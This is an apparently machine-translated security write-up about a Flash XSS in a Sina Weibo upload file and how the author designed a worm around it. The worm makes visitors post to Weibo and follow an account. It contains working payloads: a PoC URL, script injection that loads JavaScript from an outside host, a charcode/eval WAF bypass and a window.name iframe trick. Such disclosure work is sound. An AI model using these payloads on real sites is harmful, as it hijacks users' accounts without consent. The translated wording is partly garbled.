From a Flash XSS on Sina Weibo to XSS Worm

From a Flash XSS on Sina Weibo to XSS Worm

I have been studying some flash files recently, hoping to find something.

By accident, a swf: http://vgirl.weibo.com/swf/BlogUp.swf (repaired), which is generally known as XSS, which is the flash of the upload.

Decompilation:

private function init(Number:flash.events::Event = null){    // debugfile: F:\flash\blogUp_Vgirl\src;;xblogUploadImage.as    stage.scaleMode = StageScaleMode.NO_SCALE;    this.bIsUploading = false;    this.tList = new Array();    removeEventListener(Event.ADDED_TO_STAGE, this.init);    var loc0:* = new Sprite();    lineStyle();    beginFill(0, 0);    drawRect(0, 0, 1000, 1000);    loc0.buttonMode = true;    loc0.addEventListener(MouseEvent.CLICK, this.onClicked);    this.addChild(loc0);    var loc2:* = 0;    loc0.y = 0;    loc0.x = undefined;    this.jsonselectfiles = stage.loaderInfo.parameters["onselectfiles"] + "";    this.jsonsinglecomplete = stage.loaderInfo.parameters["onsinglecomplete"] + "";    this.jsonallcomplete = stage.loaderInfo.parameters["onallcomplete"] + "";    this.jsonerror = stage.loaderInfo.parameters["onerror"] + "";    this.onUploadStart = stage.loaderInfo.parameters["onUploadStart"] + "";    var loc1:* = stage.loaderInfo.parameters["onflashready"] + "";    ExternalInterface.addCallback("setup", this.setup);    ExternalInterface.addCallback("cancel", this.closeUploader);    ExternalInterface.addCallback("setMaxSize", this.setMaxSize);    ExternalInterface.call(loc1);    return;    }

ExternalInterface. call (loc1); this statement obviously has an XSS. loc1 is the GET parameter stage. loaderInfo. parameters ["onflashready"].

Let's try:

Pop up. In fact, the preceding parameters also exist in XSS, but this xss is the most obvious. I will not mention the first few parameters.

If the first parameter of the ExternalInterface. call function is controllable, we 'd better write the POC as this: http://vgirl.weibo.com/swf/BlogUp.swf? Onflashready = (function () {alert (1)}), because it and the following parameters constitute an executed code:

(function(){alert(1)})(param1, param2, ...)

Because we have no parameters for this vulnerability, the final javascript Execution is actually (function () {alert (1) you can do what you want with your own payload.

Then I want to submit it and go to sina src to see an announcement:

I will clean it! XSS

All vulnerabilities are downgraded because httponly is added to the cookie?

I mean, if you just pay it in this way, you can get at most two gold coins !!

I have been digging for half a day to change this gold coin. No, So let's think about how to make my XSS play a role. Otherwise, it will be quite wrong. A worm.

I have noticed that vgirl.weibo.com is a rated flash on the homepage, which is probably shared with MM.

Some of my sister paper is quite good. I like it. To analyze the flash:

Five APIs are very eye-catching. After analysis, in fact, the first is to obtain the list of sister paper, the second is to rate the sister paper, the third is to share with Weibo, and the fourth is to obtain specific sister paper information, the fifth is to pay attention to this paper.

Obviously, the third and fifth are what I want (for example, Mao is not the first and fourth ?). I can use these two APIs and the previous XSS to allow users to post arbitrary Weibo posts and follow me, resulting in a Weibo worm.

Next, let's continue to analyze how to use the API (in fact, it is easier to capture packets than to view flash code. I will not demonstrate packet capture ):

private function atShe(arg0:*){    var loc0:* = new URLVariables();    loc0.text = arg0.content;    loc0.uid = arg0.oid;    loc0.img = arg0.picurl;    var loc1:* = new URLRequest(this.atApi);    loc1.method = URLRequestMethod.POST;    loc1.data = new URLVariables();    var loc2:* = new URLLoader();    load(loc1);    return;    }

This is a function for posting Weibo. In fact, it sends a POST packet, text is the content to be published, img is a sister paper image, and uid is the user ID of sister paper.

In fact, text can write any text, and img can be any image (an image belonging to Sina sinaimg.cn, just find an image upload interface to upload one). uid can be left blank.

For example, such a data packet can post a microblog:

Well, with this interface, we can create a worm.

First write a payload, I used a javascript helper tool love. js (https://github.com/quininer/hisoka/blob/master/doc/LoveJS.md & https://quininer.github.io/tests/love.js) written by the parsec team rabbit Jun to send packets.

Then upload it to your server:

Http://mhz.pw/game/vgirl/poc.js

First of all, we need to be clear about this. Sina's overall defense against CSRF relies on Referer. Therefore, no matter where Weibo posts it, it will check whether the referer comes from a valid domain. This script does not work in other places, but because we have found a flash xss, it is in the Sina vgirl domain and is legal and reasonable.

Therefore, our current job is to let this flash load my js file.

We first thought of a payload:

http://vgirl.weibo.com/swf/BlogUp.swf?onflashready=(function(){document.body.appendChild(document.createElement("script")).src="http://mhz.pw/game/vgirl/poc.js"})

However, you will find that if the referer is the referer, Weibo will not be able to send the referer. I want to see whether the referer is intercepted by WAF or not.

Tested. The intercepted keyword is appendChild.

I think it's easy. Replace payload

eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,61,34,104,116,116,112,58,47,47,109,104,122,46,112,119,47,103,97,109,101,47,118,103,105,114,108,47,118,103,105,114,108,46,106,115,34))

No more keywords. The result shows that the URL is too long and flash cannot be loaded.

Think about how to shorten the URL without any keywords? Of course, window. name is used:

<iframe src="/Article/UploadPic/2015-5/2015527105623165.jpg" name="document.body.appendChild(document.createElement('script')).src='http://mhz.pw/game/vgirl/poc.js'" id="vg">

Place EXP in the name of iframe, and the actual payload is setTimeout (window. name, 0). If window. name is executed, my EXP is executed.

Beautify the code and upload it to the server.

A microblog like this can be published upon access:

If you change it to attractive text and images, most of my fans will click it later. Once you access this link, you will also post such a microblog.

In this way, ten or even one hundred rows are passed.

The formation of an XSS worm is very harmful. Similarly, I can also send a packet that follows me, while crawling, it can also increase the powder infinitely.

Due to legal restrictions, I will not perform tests. About Sina Weibo worm, I used to have a test: http://wooyun.org/bugs/wooyun-2010-065761, here you can see, and the vendor reply.

Testing is risky. Exercise caution when crawling ......